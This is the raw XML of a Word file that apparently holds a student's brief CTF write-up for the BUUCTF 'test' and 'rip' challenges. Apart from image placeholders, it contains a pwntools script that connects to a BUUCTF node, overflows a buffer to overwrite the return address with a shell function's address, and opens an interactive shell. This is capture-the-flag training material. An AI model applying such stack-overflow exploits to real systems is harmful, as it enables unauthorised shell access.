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E998BF" w14:textId="571A218A" w:rsidR="00241664" w:rsidRPr="00FF4B0F" w:rsidRDefault="00241664">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4B0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>BUU test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1DC64B" w14:textId="7F41D086" w:rsidR="00AC2535" w:rsidRDefault="00241664">
      <w:r w:rsidRPr="00241664">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19550FF0" wp14:editId="6480A861">
            <wp:extent cx="5274310" cy="3340735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="235792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92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A2F8" w14:textId="7DF39F3E" w:rsidR="00241664" w:rsidRPr="00FF4B0F" w:rsidRDefault="00241664">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF4B0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>BUU rip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98A5E1" w14:textId="00374631" w:rsidR="00241664" w:rsidRDefault="00241664">
      <w:r w:rsidRPr="00241664">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="638C882F" wp14:editId="6574890C">
            <wp:extent cx="5274310" cy="3454400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8557458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458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207A" w14:textId="4501664A" w:rsidR="00241664" w:rsidRDefault="00241664">
      <w:r w:rsidRPr="00241664">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61D67BFB" wp14:editId="29944E24">
            <wp:extent cx="5274310" cy="1083945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="15071233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123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然后写</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C8C838" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B5BE52" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716"/>
    <w:p w14:paraId="7C532F8B" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:r>
        <w:t>r = remote("node5.buuoj.cn",27068)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E53ECF2" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x0040118A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5C6B9" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:r>
        <w:t>offset = 0xF + 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9573A3" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:r>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' * offset + p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81F22F" w14:textId="77777777" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>r.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FC57B" w14:textId="1034B0DF" w:rsidR="00014716" w:rsidRDefault="00014716" w:rsidP="00014716">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>r.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1DCAA" w14:textId="61DB11E7" w:rsidR="00014716" w:rsidRDefault="00014716">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014716">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4AA68F" wp14:editId="36E73A5D">
            <wp:extent cx="5274310" cy="3313430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="73318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187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7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88B"/>
    <w:rsid w:val="00014716"/>
    <w:rsid w:val="00093498"/>
    <w:rsid w:val="00157676"/>
    <w:rsid w:val="00241664"/>
    <w:rsid w:val="004C688B"/>
    <w:rsid w:val="00502135"/>
    <w:rsid w:val="00966887"/>
    <w:rsid w:val="00AC2535"/>
    <w:rsid w:val="00E4218A"/>
    <w:rsid w:val="00FF4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87318"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DAC08370-CACF-459D-B2B9-0D3E3B3CE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昱淇 焦</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>昱淇 焦</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-26T00:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-26T00:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>